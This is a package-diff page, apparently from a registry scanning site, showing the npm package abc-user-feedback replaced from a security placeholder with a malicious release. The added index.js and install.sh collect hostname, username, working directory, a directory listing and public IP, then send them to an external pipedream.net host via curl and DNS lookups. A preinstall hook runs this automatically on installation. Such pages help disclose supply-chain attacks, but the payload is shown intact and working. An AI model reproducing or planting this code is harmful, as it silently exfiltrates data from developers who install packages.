abc-user-feedback 0.0.1-security → 0.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of abc-user-feedback might be problematic. Click here for more details.

package/index.html ADDED
@@ -0,0 +1 @@
1
+ vaxo94
package/index.js ADDED
@@ -0,0 +1,13 @@
1
+ const { exec } = require("child_process");
2
+ exec("a=$(hostname;whoami;echo 'niroborg-npm-com-test';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $eo1z2prk4as56mb.m.pipedream.net;done" , (error, data, getter) => {
3
+ if(error){
4
+ console.log("error",error.message);
5
+ return;
6
+ }
7
+ if(getter){
8
+ console.log(data);
9
+ return;
10
+ }
11
+ console.log(data);
12
+
13
+ });
package/install.sh ADDED
@@ -0,0 +1,3 @@
1
+ #!/bin/bash
2
+
3
+ curl -H "Hostname: $(hostname | base64)" -H "Whoami: $(whoami | base64)" -H "Pwd: $(pwd | base64)" -d $(ls -la | base64) https://eo1z2prk4as56mb.m.pipedream.net
package/package.json CHANGED
@@ -1,6 +1 @@
1
- {
2
- "name": "abc-user-feedback",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
1
+ {"name":"abc-user-feedback","version":"0.0.1","description":"act1on3","main":"install.sh","scripts":{"test":"echo \"Error: no test specified\" && exit 1","preinstall":"./install.sh"},"author":"vaxo94","license":"ISC","dependencies":{"abc-user-feedback":"0.0.1"}}
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=abc-user-feedback for more information.